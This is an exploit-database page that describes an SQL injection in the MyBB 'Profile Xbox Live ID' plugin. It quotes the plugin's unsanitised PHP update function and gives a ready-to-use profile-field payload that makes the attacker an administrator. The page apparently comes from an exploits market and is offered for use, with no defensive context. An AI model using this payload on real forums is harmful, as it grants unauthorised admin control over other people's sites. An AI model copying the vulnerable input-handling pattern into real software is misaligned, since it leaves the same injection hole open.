[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MyBB Profile Xbox Live ID SQL Injection Vulnerability

Author
n3urot0xin
Risk
[
Security Risk High
]
0day-ID
0day-ID-20001
Category
web applications
Date add
18-12-2012
Platform
php
Title: MyBB Profile Xbox Live ID SQL Injection
Vendor: http://mods.mybb.com/view/profile-xbox-live-id
Author: Josephvb10
Exploit Author: n3urot0xin

Code:
function profilexli_update($xli)
{
  global $mybb;

  if (isset($mybb->input['xli']))
   {
      $xli->user_update_data['xli'] = $mybb->input['xli'];
   }
}

Become admin (SQLi Ex):
Edit Profile -> XBL ID = x', usergroup='4

#  0day.today [2024-12-25]  #